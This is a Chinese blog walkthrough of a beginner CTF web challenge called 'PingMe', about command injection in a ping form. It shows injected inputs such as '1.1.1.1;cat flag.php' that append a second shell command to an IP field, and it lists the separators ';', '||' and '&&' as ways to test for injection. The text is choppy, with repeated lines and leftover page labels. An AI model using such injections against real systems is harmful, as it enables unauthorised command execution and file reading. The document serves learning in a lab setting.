Advertisement

青少年CTF-Web-Easy PingMe攻略

阅读量:

题目平台:青少年ctf

解题工具:浏览器

前言:根据题目意思得知该题目为命令执行【命令注入】

题目图片:

第一步:启动靶场,然后打开链接查看原型

1.1.1.1;ls

1.1.1.1;ls

1.1.1.1;ls

;

;

flag.php

1.1.1.1;cat flag.php

示例输出

;

复制代码
1.1.1;cat flag.php #一定要注意是英文的分号
    
    代码解读

第三步:提交测试

CTRL+U

CTRL+U

CTRL+U

Ctrl+U

复制代码
    CTRL+U
    
    代码解读

第四步:查看源代码

果然得到了结果哈哈哈, 那么为什么不直接显示出来呢?因为它是PHP语言, 并且将flag赋值到了变量中, 也没有进行输出!

end:遇到命令注入的可以尝试【; || &&】等符号测试

复制代码
    end:遇到命令注入的可以尝试【; || &&】等符号测试
    
    代码解读

本文仅供学习

全部评论 (0)

还没有任何评论哟~